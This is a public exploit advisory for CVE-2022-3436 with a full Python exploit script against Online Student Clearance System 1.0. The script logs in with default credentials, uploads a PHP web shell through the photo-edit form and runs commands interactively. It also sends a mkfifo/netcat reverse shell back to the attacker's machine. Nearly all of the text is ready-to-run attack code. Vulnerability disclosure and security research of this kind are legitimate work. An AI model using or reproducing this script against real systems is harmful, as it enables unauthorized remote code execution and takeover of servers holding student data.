Authored by Akash Pandey

Online Student Clearance System versions 1.0 and below suffer from a remote shell upload vulnerability.

advisories | CVE-2022-3436

#!/usr/bin/python3

# Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated)
# Date: 28/11/2023
# Exploit Author: Akash Pandey aka l3v1ath0n
# Version: <= 1.0
# Tested on: Kali Linux
# CVE : CVE-2022-3436

import requests
import time
import os


print("""

____ ___ ____ ____ _____ _ _ _____ __
_____ _____ |___ / _ ___ |___ |___ /| || ||___ / / /_
/ __ / / _ _____ __) | | | |__) | __) |____ |_ | || |_ |_ | '_
| (__ V / __/_____/ __/| |_| / __/ / __/_____|__) |__ _|__) | (_) |
___| _/ ___| |_____|___/_____|_____| |____/ |_||____/ ___/

Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️:
Twitter: https://twitter.com/_l3v1ath0n
Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/
""")


web_url = "http://192.168.1.26/student/" # Edit this as per your need
username = "18/132010" # Default Username
password = "11111111" # Default Password
local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell
local_port = "1337" # Port of local machine to connect reverse shell on...
rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f"

# Firing request to login
log_url = web_url+"login.php"

#Telling script to use previous session
session = requests.Session()

#Post Body Data for login
post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''}

#Sending request to web server with required post data
response = session.post(log_url,data=post_data)

# Checking Login if Successful:
time.sleep(1)

# Creating a shell file in current directory
print("[i] Creating a shell file to upload.")

with open("shell.php","w") as file:
file.write("<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>")
file.close()
time.sleep(1)

print("[i] Checking Login.")

if response.history:
print("[+] Login Successful.")

time.sleep(1)

print("[i] Uploading Shell.")

# Step 1: Reads the shell.php file in current folder
# Step 2: Stores the content in filename called shell.php
# Step 3: Uses the variable name userImage to upload file to server.
file = {'userImage':('shell.php',open("shell.php","rb"))}

# Sending payload as POST data to shell.php file
payload = {'userImage':"<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>",'btnedit':''}

# Uploading the malicious php file at below path using files and data values
upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload)
print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script")
while True:
command = input("l3v1ath0n㉿CVE-2022-3436: ")
if command == "exit":
break
elif command == "netcat":
print("[!] Don't forget to start Netcat Listener")
time.sleep(3)
payload = {'cmd':rev_shell}
cmd = session.get(web_url+"uploads/shell.php?",params=payload)
print(cmd.text)
else:
payload = {'cmd':command}
cmd = session.get(web_url+"uploads/shell.php?",params=payload)
print(cmd.text)

print("n[i] Closing this Session")
session.close()

else:
print("[-] Login Failed.")